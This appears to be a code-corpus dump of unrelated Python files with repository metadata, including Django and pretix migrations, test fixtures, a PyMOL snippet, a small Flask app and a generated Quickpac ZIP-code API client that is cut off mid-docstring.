soil/skeleton/migrations/0005_auto_20200319_1134.py
|
mahalsnz/soilmoisture
|
e6579fbcd0d15982a24a29172b1e57830a54a4f6
|
[
"FSFAP"
] | 146
|
2019-06-19T03:15:55.000Z
|
2021-06-21T22:50:06.000Z
|
soil/skeleton/migrations/0005_auto_20200319_1134.py
|
mahalsnz/terraprobe
|
e6579fbcd0d15982a24a29172b1e57830a54a4f6
|
[
"FSFAP"
] | 4
|
2019-06-09T22:10:14.000Z
|
2020-08-03T21:11:25.000Z
|
# Generated by Django 2.2.1 on 2020-03-18 22:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('skeleton', '0004_auto_20200314_1328'),
]
operations = [
migrations.RemoveField(
model_name='site',
name='rz1_top',
),
migrations.RemoveField(
model_name='site',
name='rz2_top',
),
migrations.RemoveField(
model_name='site',
name='rz3_top',
),
migrations.AlterField(
model_name='calibration',
name='soil_type',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=1, null=True),
),
migrations.AlterField(
model_name='site',
name='depth1',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth10',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth2',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth3',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth4',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth5',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth6',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth7',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth8',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth9',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he1',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=1, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he10',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=10, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he2',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=2, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he3',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=3, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he4',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=4, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he5',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=5, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he6',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=6, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he7',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=7, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he8',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=8, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he9',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=9, null=True),
),
migrations.AlterField(
model_name='site',
name='rz1_bottom',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, help_text='The Bottom Depth of Root Zone 1. The Top will always be zero.', null=True),
),
migrations.AlterField(
model_name='site',
name='rz2_bottom',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, help_text='The Bottom Depth of Root Zone 2. The Top will always be zero.', null=True),
),
migrations.AlterField(
model_name='site',
name='rz3_bottom',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, help_text='The Bottom Depth of Root Zone 3. The Top will always be zero.', null=True),
),
]
| 54.390411
| 290
| 0.488603
| 1,100
| 7,941
| 3.481818
| 0.087273
| 0.063446
| 0.088251
| 0.115405
| 0.918799
| 0.914099
| 0.904178
| 0.882768
| 0.863446
| 0.756397
| 0
| 0.188636
| 0.279688
| 7,941
| 145
| 291
| 54.765517
| 0.480944
| 0.005667
| 0
| 0.661871
| 1
| 0
| 0.068153
| 0.002914
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007194
| 0
| 0.028777
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
14e7779be7b2053d20777d3019a66eedb7132323
| 4,967
|
py
|
Python
|
sla_cli/tests/src/download/isic/conftest.py
|
DavidWalshe93/SL-CLI
|
c92ca8a6e57eb51bf9c9433013ce16d443f8d152
|
[
"MIT"
] | 2
|
2022-01-07T09:59:32.000Z
|
2022-01-25T12:04:06.000Z
|
sla_cli/tests/src/download/isic/conftest.py
|
DavidWalshe93/SL-CLI
|
c92ca8a6e57eb51bf9c9433013ce16d443f8d152
|
[
"MIT"
] | null | null | null |
sla_cli/tests/src/download/isic/conftest.py
|
DavidWalshe93/SL-CLI
|
c92ca8a6e57eb51bf9c9433013ce16d443f8d152
|
[
"MIT"
] | 1
|
2021-04-07T17:14:37.000Z
|
2021-04-07T17:14:37.000Z
|
"""
Author: David Walshe
Date: 10 April 2021
"""
import pytest
from sla_cli.src.download.downloader import DownloaderOptions
@pytest.fixture
def sample_isic_records():
"""Returns two isic archive metadata records."""
return [
{
'_id': '5436e3abbae478396759f0cf',
'_modelType': 'image',
'created': '2014-10-09T19:36:11.989000+00:00',
'creator': {'_id': '5450e996bae47865794e4d0d', 'name': 'User 6VSN'},
'dataset': {'_accessLevel': 0,
'_id': '5a2ecc5e1165975c945942a2',
'description': 'Moles and melanomas.\n'
'Biopsy-confirmed melanocytic lesions. Both '
'malignant and benign lesions are included.',
'license': 'CC-0',
'name': 'UDA-1',
'updated': '2014-11-10T02:39:56.492000+00:00'},
'meta': {'acquisition': {'image_type': 'dermoscopic',
'pixelsX': 1022,
'pixelsY': 767},
'clinical': {'age_approx': 55,
'anatom_site_general': 'anterior torso',
'benign_malignant': 'benign',
'diagnosis': 'nevus',
'diagnosis_confirm_type': None,
'melanocytic': True,
'sex': 'female'}},
'name': 'ISIC_0000000',
'notes': {'reviewed': {'accepted': True,
'time': '2014-11-10T02:39:56.492000+00:00',
'userId': '5436c6e7bae4780a676c8f93'},
'tags': ['Challenge 2018: Task 1-2: Training',
'Challenge 2019: Training',
'Challenge 2016: Training',
'Challenge 2017: Training']},
'updated': '2015-02-23T02:48:17.495000+00:00'
},
{
'_id': '5436e3acbae478396759f0d1',
'_modelType': 'image',
'created': '2014-10-09T19:36:12.070000+00:00',
'creator': {'_id': '5450e996bae47865794e4d0d', 'name': 'User 6VSN'},
'dataset': {'_accessLevel': 0,
'_id': '5a2ecc5e1165975c945942a2',
'description': 'Moles and melanomas.\n'
'Biopsy-confirmed melanocytic lesions. Both '
'malignant and benign lesions are included.',
'license': 'CC-0',
'name': 'UDA-1',
'updated': '2014-11-10T02:39:56.492000+00:00'},
'meta': {'acquisition': {'image_type': 'dermoscopic',
'pixelsX': 1022,
'pixelsY': 767},
'clinical': {'age_approx': 30,
'anatom_site_general': 'anterior torso',
'benign_malignant': 'benign',
'diagnosis': 'nevus',
'diagnosis_confirm_type': None,
'melanocytic': True,
'sex': 'female'}},
'name': 'ISIC_0000001',
'notes': {'reviewed': {'accepted': True,
'time': '2014-11-10T02:39:56.492000+00:00',
'userId': '5436c6e7bae4780a676c8f93'},
'tags': ['Challenge 2018: Task 1-2: Training',
'Challenge 2019: Training',
'Challenge 2016: Training',
'Challenge 2017: Training']},
'updated': '2015-02-23T02:48:27.455000+00:00'
}
]
@pytest.fixture
def expected_column_names():
"""Expected column names for metadata."""
return [
"isic_id",
"image_name",
"dataset",
"description",
"accepted",
"created",
"tags",
"pixels_x",
"pixels_y",
"age",
"sex",
"localization",
"benign_malignant",
"dx",
"dx_type",
"melanocytic"
]
@pytest.fixture
def expected_extended_column_names():
"""Expected column names for metadata after year tagging."""
return [
"isic_id",
"image_name",
"dataset",
"description",
"accepted",
"created",
"tags",
"pixels_x",
"pixels_y",
"age",
"sex",
"localization",
"benign_malignant",
"dx",
"dx_type",
"melanocytic",
"2016"
"2017"
"2018"
"2019"
"2020"
]
| 37.345865
| 84
| 0.421784
| 365
| 4,967
| 5.613699
| 0.372603
| 0.015617
| 0.021474
| 0.025378
| 0.816984
| 0.816984
| 0.816984
| 0.743777
| 0.743777
| 0.743777
| 0
| 0.15545
| 0.449567
| 4,967
| 132
| 85
| 37.628788
| 0.594001
| 0.037044
| 0
| 0.752137
| 0
| 0
| 0.384874
| 0.103361
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025641
| true
| 0
| 0.017094
| 0
| 0.068376
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
09152ad3ad03b67623840f46ff00dbfdbecb9083
| 244
|
py
|
Python
|
jupyterlab2pymolpysnips/H-bonds/distance.py
|
MooersLab/pymolpysnips
|
50a89c85adf8006d85c1d6cd3f8aad7e440a0b92
|
[
"MIT"
] | null | null | null |
jupyterlab2pymolpysnips/H-bonds/distance.py
|
MooersLab/pymolpysnips
|
50a89c85adf8006d85c1d6cd3f8aad7e440a0b92
|
[
"MIT"
] | null | null | null |
jupyterlab2pymolpysnips/H-bonds/distance.py
|
MooersLab/pymolpysnips
|
50a89c85adf8006d85c1d6cd3f8aad7e440a0b92
|
[
"MIT"
] | null | null | null |
"""
cmd.do('distance ${1:dist3}, ${2:/rcsb074137//B/IOD`605/I`B}, ${3:/rcsb074137//B/IOD`605/I`A}')
"""
cmd.do('distance dist3, /rcsb074137//B/IOD`605/I`B, /rcsb074137//B/IOD`605/I`A')
# Description: H-bond distances.
# Source: placeHolder
| 27.111111
| 95
| 0.643443
| 41
| 244
| 3.829268
| 0.463415
| 0.280255
| 0.356688
| 0.433121
| 0.484076
| 0.484076
| 0
| 0
| 0
| 0
| 0
| 0.183857
| 0.086066
| 244
| 8
| 96
| 30.5
| 0.520179
| 0.610656
| 0
| 0
| 0
| 1
| 0.823529
| 0.623529
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0929ccba5be3fa64a3ef479a8870d54f065cbabf
| 2,505
|
py
|
Python
|
src/pretix/base/migrations/0100_auto_20181023_2300.py
|
pajowu/pretix
|
d6985123b4528f134ead71ce0a4613c9a309fd2c
|
[
"ECL-2.0",
"Apache-2.0"
] | 1,248
|
2015-04-24T13:32:06.000Z
|
2022-03-29T07:01:36.000Z
|
src/pretix/base/migrations/0100_auto_20181023_2300.py
|
pajowu/pretix
|
d6985123b4528f134ead71ce0a4613c9a309fd2c
|
[
"ECL-2.0",
"Apache-2.0"
] | 2,113
|
2015-02-18T18:58:16.000Z
|
2022-03-31T11:12:32.000Z
|
src/pretix/base/migrations/0100_auto_20181023_2300.py
|
pajowu/pretix
|
d6985123b4528f134ead71ce0a4613c9a309fd2c
|
[
"ECL-2.0",
"Apache-2.0"
] | 453
|
2015-05-13T09:29:06.000Z
|
2022-03-24T13:39:16.000Z
|
# Generated by Django 2.1 on 2018-10-23 23:00
import django_countries.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pretixbase', '0099_auto_20180912_1035'),
]
operations = [
migrations.AddField(
model_name='invoice',
name='invoice_from_city',
field=models.CharField(max_length=190, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_from_country',
field=django_countries.fields.CountryField(max_length=2, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_from_name',
field=models.CharField(max_length=190, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_from_tax_id',
field=models.CharField(max_length=190, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_from_vat_id',
field=models.CharField(max_length=190, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_from_zipcode',
field=models.CharField(max_length=190, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_city',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_company',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_country',
field=django_countries.fields.CountryField(max_length=2, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_name',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_street',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_vat_id',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_zipcode',
field=models.CharField(max_length=190, null=True),
),
]
| 31.3125
| 80
| 0.567665
| 245
| 2,505
| 5.57551
| 0.195918
| 0.20937
| 0.218887
| 0.256955
| 0.839678
| 0.839678
| 0.839678
| 0.839678
| 0.803807
| 0.764275
| 0
| 0.029412
| 0.321357
| 2,505
| 79
| 81
| 31.708861
| 0.774118
| 0.017166
| 0
| 0.712329
| 1
| 0
| 0.143902
| 0.00935
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027397
| 0
| 0.068493
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
0940bfab0ebba11557aa3ef9d2c0cd4973ba6dbe
| 522
|
py
|
Python
|
python/testData/formatter/fromImportTrailingCommaWithParentheses_after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/formatter/fromImportTrailingCommaWithParentheses_after.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/formatter/fromImportTrailingCommaWithParentheses_after.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
from module import foo
from module import foo, bar
from module import foo, bar,
# | margin
from module import (foo, bar,
baz, )
from module import (foo,
bar, )
from module import (foo,
bar, )
from module import (foo,
bar, # comment
)
from module import (foo,
bar, )
from module import (foo,
bar, )
from module import (
foo,
bar, # comment
)
| 20.076923
| 37
| 0.45977
| 53
| 522
| 4.528302
| 0.150943
| 0.416667
| 0.666667
| 0.791667
| 0.883333
| 0.791667
| 0.791667
| 0.791667
| 0.791667
| 0.791667
| 0
| 0
| 0.471264
| 522
| 25
| 38
| 20.88
| 0.869565
| 0.045977
| 0
| 0.55
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.5
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
11c1e5a7fb1343fb7225d996ae033facec29da52
| 1,757
|
py
|
Python
|
make_queue/migrations/0021_alter_id_fields_to_use_bigautofield.py
|
MAKENTNU/web
|
7a5b512bf4c087d1561cdb623d7df4b3d04811a2
|
[
"MIT"
] | 10
|
2017-11-25T01:47:20.000Z
|
2020-03-24T18:28:24.000Z
|
make_queue/migrations/0021_alter_id_fields_to_use_bigautofield.py
|
MAKENTNU/web
|
7a5b512bf4c087d1561cdb623d7df4b3d04811a2
|
[
"MIT"
] | 319
|
2017-11-16T09:56:03.000Z
|
2022-03-28T00:24:37.000Z
|
make_queue/migrations/0021_alter_id_fields_to_use_bigautofield.py
|
MAKENTNU/web
|
7a5b512bf4c087d1561cdb623d7df4b3d04811a2
|
[
"MIT"
] | 6
|
2017-11-12T14:04:08.000Z
|
2021-03-10T09:41:18.000Z
|
# Generated by Django 3.2.2 on 2021-05-11 15:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('make_queue', '0020_printer3dcourse_advanced_course'),
]
operations = [
migrations.AlterField(
model_name='machine',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='machinetype',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='machineusagerule',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='printer3dcourse',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='quota',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='reservation',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='reservationrule',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 35.857143
| 111
| 0.611838
| 177
| 1,757
| 5.892655
| 0.259887
| 0.080537
| 0.167785
| 0.194631
| 0.737296
| 0.737296
| 0.737296
| 0.737296
| 0.737296
| 0.737296
| 0
| 0.016368
| 0.269778
| 1,757
| 48
| 112
| 36.604167
| 0.796571
| 0.025612
| 0
| 0.666667
| 1
| 0
| 0.090058
| 0.021053
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02381
| 0
| 0.095238
| 0.047619
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eead57a9b9271885bd99186436507d54f8ae2a64
| 69
|
py
|
Python
|
lw_visutils/data/__init__.py
|
wolterlw/lw_visutils
|
1487a235c8c0cd71b42758ccb13760a45689889b
|
[
"MIT"
] | null | null | null |
lw_visutils/data/__init__.py
|
wolterlw/lw_visutils
|
1487a235c8c0cd71b42758ccb13760a45689889b
|
[
"MIT"
] | null | null | null |
lw_visutils/data/__init__.py
|
wolterlw/lw_visutils
|
1487a235c8c0cd71b42758ccb13760a45689889b
|
[
"MIT"
] | null | null | null |
import lw_visutils.data.wrappers
import lw_visutils.data.transformers
| 34.5
| 36
| 0.898551
| 10
| 69
| 6
| 0.6
| 0.266667
| 0.533333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 69
| 2
| 36
| 34.5
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0183624fde61b9b8bb023787016c964c88412b6b
| 170
|
py
|
Python
|
flask/app/views.py
|
hou2zi0/flask-app-docker
|
0e51b1f00201fc6eb46a62d0d8f2701bc02d4031
|
[
"MIT"
] | null | null | null |
flask/app/views.py
|
hou2zi0/flask-app-docker
|
0e51b1f00201fc6eb46a62d0d8f2701bc02d4031
|
[
"MIT"
] | null | null | null |
flask/app/views.py
|
hou2zi0/flask-app-docker
|
0e51b1f00201fc6eb46a62d0d8f2701bc02d4031
|
[
"MIT"
] | null | null | null |
from app import app
@app.route('/')
def index():
return "Hello from Flask! 🐵"
@app.route('/affe')
def affe():
return "Hello from Flask! Affe sagt Hallo! 🐵"
| 17
| 49
| 0.611765
| 26
| 170
| 4.076923
| 0.5
| 0.150943
| 0.283019
| 0.377358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.217647
| 170
| 9
| 50
| 18.888889
| 0.781955
| 0
| 0
| 0
| 0
| 0
| 0.358824
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| true
| 0
| 0.142857
| 0.285714
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
6dac5fc789cda2aff36b9b3c5169ab6b88531a81
| 8,692
|
py
|
Python
|
quickpac/api/zip_api.py
|
camptocamp/quickpack-client
|
761c08bdc3846c724adbc99b589d2db460a6bcdc
|
[
"MIT"
] | null | null | null |
quickpac/api/zip_api.py
|
camptocamp/quickpack-client
|
761c08bdc3846c724adbc99b589d2db460a6bcdc
|
[
"MIT"
] | null | null | null |
quickpac/api/zip_api.py
|
camptocamp/quickpack-client
|
761c08bdc3846c724adbc99b589d2db460a6bcdc
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Quickpac API
Here you will find all public interfaces to the Quickpac system. # noqa: E501
OpenAPI spec version: v1.00
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from quickpac.api_client import ApiClient
class ZIPApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def z_ip_get_all_zip_codes_get(self, **kwargs): # noqa: E501
"""Returns all currently deliverable and planned postcodes. # noqa: E501
### Deliverable and planned postcodes * This API returns all postcodes in a list which can be supplied by Quickpac now or in the future. * Each postcode contains the first and last day of delivery by Quickpac * In the event of an error, the 'Error' or 'Warning' property is set with one or more corresponding messages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.z_ip_get_all_zip_codes_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: ZIPAllResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.z_ip_get_all_zip_codes_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.z_ip_get_all_zip_codes_get_with_http_info(**kwargs) # noqa: E501
return data
def z_ip_get_all_zip_codes_get_with_http_info(self, **kwargs): # noqa: E501
"""Returns all currently deliverable and planned postcodes. # noqa: E501
### Deliverable and planned postcodes * This API returns all postcodes in a list which can be supplied by Quickpac now or in the future. * Each postcode contains the first and last day of delivery by Quickpac * In the event of an error, the 'Error' or 'Warning' property is set with one or more corresponding messages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.z_ip_get_all_zip_codes_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: ZIPAllResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method z_ip_get_all_zip_codes_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json', 'application/xml', 'text/xml']) # noqa: E501
# Authentication setting
auth_settings = ['Basic'] # noqa: E501
return self.api_client.call_api(
'/ZIP/GetAllZipCodes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ZIPAllResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def z_ip_is_deliverable_zip_code_get(self, **kwargs): # noqa: E501
"""Checks whether the requested postcode can currently be delivered. # noqa: E501
### Deliverable zip code * This API checks whether the requested zip code can currently be supplied by Quickpac. * In the event of an error, the 'Error' or 'Warning' property is set with one or more corresponding messages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.z_ip_is_deliverable_zip_code_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int zip_code: ZIP code in the range from 1,000 - 9,999.
:return: ZIPIsCurrentResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.z_ip_is_deliverable_zip_code_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.z_ip_is_deliverable_zip_code_get_with_http_info(**kwargs) # noqa: E501
return data
def z_ip_is_deliverable_zip_code_get_with_http_info(self, **kwargs): # noqa: E501
"""Checks whether the requested postcode can currently be delivered. # noqa: E501
